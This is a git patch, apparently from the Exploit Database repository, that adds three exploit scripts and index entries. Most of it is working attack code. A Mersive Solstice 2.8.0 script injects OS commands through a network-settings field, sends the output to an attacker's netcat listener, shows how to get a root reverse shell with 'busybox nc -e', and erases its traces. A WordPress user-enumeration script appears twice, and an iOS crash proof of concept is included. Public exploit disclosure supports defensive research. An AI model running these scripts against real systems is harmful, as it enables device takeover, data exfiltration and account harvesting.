From 7921f1a5231193190672db5a7df6c34a95acd11a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 29 Nov 2019 05:01:48 +0000 Subject: [PATCH] DB: 2019-11-29 4 changes to exploits/shellcodes GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC) Wordpress 5.3 - User Disclosure Mersive Solstice 2.8.0 - Remote Code Execution --- exploits/hardware/webapps/47722.py | 208 +++++++++++++++++++++++++++++ exploits/ios/dos/47721.py | 30 +++++ exploits/php/webapps/47720.txt | 112 ++++++++++++++++ exploits/windows/local/46416.txt | 2 +- files_exploits.csv | 3 + 5 files changed, 354 insertions(+), 1 deletion(-) create mode 100755 exploits/hardware/webapps/47722.py create mode 100755 exploits/ios/dos/47721.py create mode 100644 exploits/php/webapps/47720.txt diff --git a/exploits/hardware/webapps/47722.py b/exploits/hardware/webapps/47722.py new file mode 100755 index 000000000..76c7b0906 --- /dev/null +++ b/exploits/hardware/webapps/47722.py @@ -0,0 +1,208 @@ +# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution +# Google Dork: N/A +# Date: 2016-12-23 +# Exploit Author: Alexandre Teyar +# Vendor Homepage: https://www2.mersive.com/ +# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk +# Versions: 2.8.0 +# Tested On: Mersive Solstice 2.8.0 +# CVE: CVE-2017-12945 +# Description : This will exploit an (authenticated) blind OS command injection +# vulnerability present in Solstice devices running versions +# of the firmware prior to 2.8.4. +# Notes : To get the the command output (in piped-mode), a netcat listener +# (e.g. 'nc -lkvp ') needs to be launched before +# running the exploit. +# To get an interactive root shell use the following syntax +# 'python.exe .\CVE-2017-12945.py -pass +# -rh -p "busybox nc +# -e /system/bin/sh -i"'. + + +#!/usr/bin/env python3 + +import argparse +import logging +import requests +import sys +import time + + +def parse_args(): + """ Parse and validate the command line supplied by users + """ + parser = argparse.ArgumentParser( + description="Solstice Pod Blind Command Injection" + ) + + parser.add_argument( + "-d", + "--debug", + dest="loglevel", + help="enable verbose debug mode", + required=False, + action="store_const", + const=logging.DEBUG, + default=logging.INFO + ) + parser.add_argument( + "-lh", + "--lhost", + dest="lhost", + help="the listening address", + required=False, + type=str + ) + parser.add_argument( + "-lp", + "--lport", + dest="lport", + help="the listening port - default 4444", + required=False, + default="4444", + type=str + ) + parser.add_argument( + "-p", + "--payload", + dest="payload", + help="the command to execute", + required=True, + type=str + ) + parser.add_argument( + "-pass", + "--password", + dest="password", + help="the target administrator password", + required=False, + default="", + type=str + ) + parser.add_argument( + "-rh", + "--rhost", + dest="rhost", + help="the target address", + required=True, + type=str + ) + + return parser.parse_args() + + +def main(): + try: + args = parse_args() + + lhost = args.lhost + lport = args.lport + password = args.password + rhost = args.rhost + + logging.basicConfig( + datefmt="%H:%M:%S", + format="%(asctime)s: %(levelname)-8s %(message)s", + handlers=[logging.StreamHandler()], + level=args.loglevel + ) + + # Redirect stdout and stderr to + # only when the exploit is launched in piped mode + if lhost and lport: + payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1" + logging.info( + "attacker listening address: {}:{}".format(lhost, lport) + ) + else: + payload = args.payload + + logging.info("solstice pod address: {}".format(rhost)) + + if password: + logging.info( + "solstice pod administrator password: {}".format(password) + ) + + # Send the payload to be executed + logging.info("sending the payload...") + send_payload(rhost, password, payload) + + # Send the results of the payload execution to the attacker + # using 'nc < ' then remove + if lhost and lport: + payload = ( + "busybox nc {} {} < /data/local/tmp/rce.tmp ".format( + lhost, lport + ) + ) + + logging.info("retrieving the results...") + send_payload(rhost, password, payload) + + # Erase exploitation traces + payload = "rm -f /data/local/tmp/rce.tmp" + + logging.info("erasing exploitation traces...") + send_payload(rhost, password, payload) + + except KeyboardInterrupt: + logging.warning("'CTRL+C' pressed, exiting...") + sys.exit(0) + + +def send_payload(rhost, password, payload): + URL = "http://{}/Config/service/saveData".format(rhost) + + headers = { + "Content-Type": "application/json", + "X-Requested-With": "XMLHttpRequest", + "Referer": "http://{}/Config/config.html".format(rhost) + } + + data = { + "m_networkCuration": + { + "ethernet": + { + "dhcp": False, + "staticIP": "; {}".format(payload), + "gateway": "", + "prefixLength": 24, + "dns1": "", + "dns2": "" + } + }, + "password": "{}".format(password) + } + + # Debugging using the BurpSuite + # proxies = { + # 'http': 'http://127.0.0.1:8080', + # 'https': 'https://127.0.0.1:8080' + # } + + try: + logging.info("{}".format(payload)) + + response = requests.post( + URL, + headers=headers, + # proxies=proxies, + json=data + ) + + logging.debug( + "{}".format(response.json()) + ) + + # Wait for the command to be executed + time.sleep(2) + + except requests.exceptions.RequestException as ex: + logging.error("{}".format(ex)) + sys.exit(0) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/ios/dos/47721.py b/exploits/ios/dos/47721.py new file mode 100755 index 000000000..7eb12cb1b --- /dev/null +++ b/exploits/ios/dos/47721.py @@ -0,0 +1,30 @@ +# Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC) +# Discovery by: Ivan Marmolejo +# Discovery Date: 2019-11-27 +# Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963 +# Software Link: App Store for iOS devices +# Tested Version: 1.2 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 6s iOS 13.2.3 + +# Summary: With GHIA CamIP you can view your cameras in real time supports conventional IPC cameras, +# cameras with alarm, Video intercom and other devices. + + +# Steps to Produce the Crash: +# 1.- Run python code: GHIA.py +# 2.- Copy content to clipboard +# 3.- Open "GHIA CamIP for iOS" +# 4.- Go to "Add" +# 5.- Wireless Settings +# 6.- Connect to the internet +# 7.- Paste Clipboard on "Password" +# 8.- WiFi Connection +# 9.- Start setting +# 10- Crashed + + +#!/usr/bin/env python + +buffer = "\x41" * 33 +print (buffer) \ No newline at end of file diff --git a/exploits/php/webapps/47720.txt b/exploits/php/webapps/47720.txt new file mode 100644 index 000000000..f35cf09ad --- /dev/null +++ b/exploits/php/webapps/47720.txt @@ -0,0 +1,112 @@ +# Exploit Title : Wordpress 5.3 - User Disclosure +# Author: SajjadBnd +# Date: 2019-11-17 +# Software Link: https://wordpress.org/download/ +# version : wp < 5.3 +# tested on : Ubunutu 18.04 / python 2.7 +# CVE: N/A + + +#!/usr/bin/python +# -*- coding: utf-8 -*- +# + + +import requests +import os +import re +import json +import sys +import urllib3 + +def clear(): + linux = 'clear' + windows = 'cls' + os.system([linux, windows][os.name == 'nt']) +def Banner(): + print(''' +- Wordpress < 5.3 - User Enumeration +- SajjadBnd +''') +def Desc(): + url = raw_input('[!] Url >> ') + vuln = url + "/wp-json/wp/v2/users/" + while True: + try: + r = requests.get(vuln,verify=False) + content = json.loads(r.text) + data(content) + except requests.exceptions.MissingSchema: + vuln = "http://" + vuln +def data(content): + for x in content: + name = x["name"].encode('UTF-8') + print("======================") + print("[+] ID : " + str(x["id"])) + print("[+] Name : " + name) + print("[+] User : " + x["slug"]) + sys.exit(1) +if __name__ == '__main__': + urllib3.disable_warnings() + reload(sys) + sys.setdefaultencoding('UTF8') + clear() + Banner() + Desc() + +wpuser.txt + +#!/usr/bin/python +# -*- coding: utf-8 -*- +# +# Exploit Title : Wordpress < 5.3 - User Disclosure +# Exploit Author: SajjadBnd +# email : blackwolf@post.com +# Software Link: https://wordpress.org/download/ +# version : wp < 5.3 +# tested on : Ubunutu 18.04 / python 2.7 + +import requests +import os +import re +import json +import sys +import urllib3 + +def clear(): + linux = 'clear' + windows = 'cls' + os.system([linux, windows][os.name == 'nt']) + +def Banner(): + print(''' +- Wordpress < 5.3 - User Enumeration +- SajjadBnd +''') + +def Desc(): + url = raw_input('[!] Url >> ') + vuln = url + "/wp-json/wp/v2/users/" + while True: + try: + r = requests.get(vuln,verify=False) + content = json.loads(r.text) + data(content) + except requests.exceptions.MissingSchema: + vuln = "http://" + vuln + +def data(content): + for x in content: + name = x["name"].encode('UTF-8') + print("======================") + print("[+] ID : " + str(x["id"])) + print("[+] Name : " + name) + print("[+] User : " + x["slug"]) + sys.exit(1) +if __name__ == '__main__': + urllib3.disable_warnings() + reload(sys) + sys.setdefaultencoding('UTF8') + clear() + Banner() + Desc() \ No newline at end of file diff --git a/exploits/windows/local/46416.txt b/exploits/windows/local/46416.txt index 0da86f017..93a82fd40 100644 --- a/exploits/windows/local/46416.txt +++ b/exploits/windows/local/46416.txt @@ -6,7 +6,7 @@ # Software Link: # Version: 1.6.2.0 (May affect other versions) # Tested on: Win 10 64 bit -# CVE : None +# CVE : CVE-2019-15084 MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations. diff --git a/files_exploits.csv b/files_exploits.csv index e447311c8..1e5cfa440 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6611,6 +6611,7 @@ id,file,description,date,author,type,platform,port 47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows, 47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows, 47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows, +47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42031,3 +42032,5 @@ id,file,description,date,author,type,platform,port 47691,exploits/php/webapps/47691.sh,"OpenNetAdmin 18.1.1 - Remote Code Execution",2019-11-20,mattpascoe,webapps,php, 47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware, 47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware, +47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php, +47722,exploits/hardware/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,hardware,